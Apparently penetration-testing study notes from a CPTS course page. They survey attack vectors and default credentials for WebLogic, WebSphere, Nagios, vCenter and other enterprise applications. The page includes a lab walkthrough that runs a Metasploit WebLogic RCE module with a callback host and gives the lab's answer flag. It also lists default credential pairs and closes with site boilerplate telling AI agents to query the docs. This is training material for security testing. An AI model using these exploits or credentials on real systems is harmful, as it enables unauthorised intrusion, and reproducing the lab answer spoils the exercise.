# Other Notable Applications > **🎯 Objective:** Reference guide for additional applications commonly encountered during penetration tests with their attack vectors and default credentials. ## Overview Beyond the main applications covered in this module, penetration testers encounter many other applications in enterprise environments. This reference covers **common vulnerabilities**, **default credentials**, and **attack techniques** for frequently seen applications. *** ## HTB Academy Lab Solutions ### Lab 1: Application Identification **Question:** "Enumerate the target host and identify the running application. What application is running?" ```bash # Standard enumeration nmap -sV -sC target # Expected: WebLogic server identification ``` ### Lab 2: WebLogic RCE Exploitation **Question:** "Enumerate the application for vulnerabilities. Gain remote code execution and submit the contents of the flag.txt file on the administrator desktop." #### Method: Metasploit WebLogic RCE ```bash # Launch Metasploit msfconsole -q # Use WebLogic RCE module use multi/http/weblogic_admin_handle_rce # Set target options set RHOSTS STMIP set SRVHOST PWNIP set LHOST PWNIP # Execute exploit exploit # In Meterpreter session: cat C:/Users/Administrator/Desktop/flag.txt ``` **Answer:** `w3b_l0gic_RCE!` *** ## Notable Applications ### 🔧 Application Servers #### **Axis2** * **Description:** Web services framework (often on Tomcat) * **Attack Vectors:** Default admin credentials, AAR file upload * **Default Creds:** Check vendor documentation * **Exploitation:** Upload webshell via AAR service files * **Tools:** Metasploit modules available #### **WebSphere** * **Description:** IBM Java EE application server * **Attack Vectors:** Default credentials, WAR file deployment * **Default Creds:** `system:manager` * **Exploitation:** Deploy WAR files for RCE * **CVEs:** Many deserialization vulnerabilities #### **WebLogic** * **Description:** Oracle Java EE application server * **Attack Vectors:** Deserialization RCE, default credentials * **CVEs:** 190+ reported vulnerabilities * **Exploitation:** Unauthenticated RCE (2007-2021) * **Common Ports:** 7001, 7002 *** ### 📊 Monitoring Systems #### **Zabbix** * **Description:** Open-source network monitoring * **Attack Vectors:** SQL injection, auth bypass, RCE via API * **Vulnerabilities:** XSS, LDAP disclosure, command injection * **API Abuse:** Remote command execution capabilities * **HTB Reference:** Zipper box #### **Nagios** * **Description:** System/network monitoring solution * **Attack Vectors:** Multiple RCE, privilege escalation * **Default Creds:** `nagiosadmin:PASSW0RD` * **Vulnerabilities:** SQL injection, code injection, XSS * **CVEs:** Wide variety over the years *** ### 🔍 Data & Search #### **Elasticsearch** * **Description:** Search and analytics engine * **Attack Vectors:** Various CVEs, misconfigurations * **Common Issues:** Open instances, data exposure * **HTB Reference:** Haystack box * **Ports:** 9200, 9300 *** ### 🏢 Enterprise Applications #### **vCenter** * **Description:** VMware management platform * **Attack Vectors:** Weak credentials, CVE exploits * **Notable CVEs:** * Apache Struts 2 RCE * CVE-2021-22005 (OVA upload) * **Impact:** Often runs as SYSTEM/domain admin * **Platforms:** Windows and Linux appliances #### **SharePoint/Wikis** * **Description:** Collaboration platforms, internal wikis * **Attack Vectors:** Known CVEs, search functionality abuse * **Data Sources:** Document repositories, credential discovery * **Common Finds:** Valid credentials in documents #### **DotNetNuke (DNN)** * **Description:** Open-source C# CMS * **Attack Vectors:** Auth bypass, directory traversal * **Vulnerabilities:** File upload bypass, arbitrary download * **Framework:** .NET-based *** ## Quick Attack Methodology ### 1. **Fingerprinting** ```bash # Identify application and version nmap -sV -sC target nikto -h http://target whatweb target ``` ### 2. **Default Credentials** ```bash # Common default combinations admin:admin admin:password system:manager nagiosadmin:PASSW0RD ``` ### 3. **Version-Specific Exploits** ```bash # Search for known exploits searchsploit application_name version nmap --script vuln target ``` ### 4. **Built-in Functionality Abuse** * **File upload** capabilities * **Command execution** features * **API endpoints** for automation * **Administrative functions** *** ## Assessment Strategy ### **Discovery Phase** * 🔍 **Port scanning** - Identify all running services * 📊 **Service enumeration** - Version and configuration detection * 🎯 **Application mapping** - Create comprehensive inventory ### **Exploitation Phase** * 🔑 **Default credentials** testing * 🐛 **Known vulnerability** exploitation * ⚙️ **Built-in functionality** abuse * 📁 **File upload** and deployment attacks ### **Intelligence Gathering** * 📄 **Document repositories** searching * 🔐 **Credential harvesting** from files * 🏗️ **Infrastructure mapping** via configs * 🔗 **Lateral movement** opportunities *** ## Key Takeaways **Common Attack Patterns:** * 🔓 **Default credentials** remain unchanged * 📦 **File upload** functionality for shells * 🔧 **Built-in features** for command execution * 📊 **API abuse** for automation and RCE **High-Impact Targets:** * **Monitoring systems** (network visibility) * **Virtualization platforms** (infrastructure control) * **Application servers** (web application hosting) * **Document repositories** (credential discovery) **Assessment Tips:** * 📋 Always check for **default credentials** first * 🔍 Look for **file upload** functionality * 📚 Search documentation for **API endpoints** * 🎯 Focus on **administrative interfaces** **💡 Pro Tip:** Many enterprises run hundreds of different applications - develop a systematic approach to quickly identify, fingerprint, and test each one. Often the most critical vulnerabilities are in lesser-known monitoring or management applications running with high privileges. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cpts-prep/web-application-attacks/attacking-common-applications/other-notable-applications.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.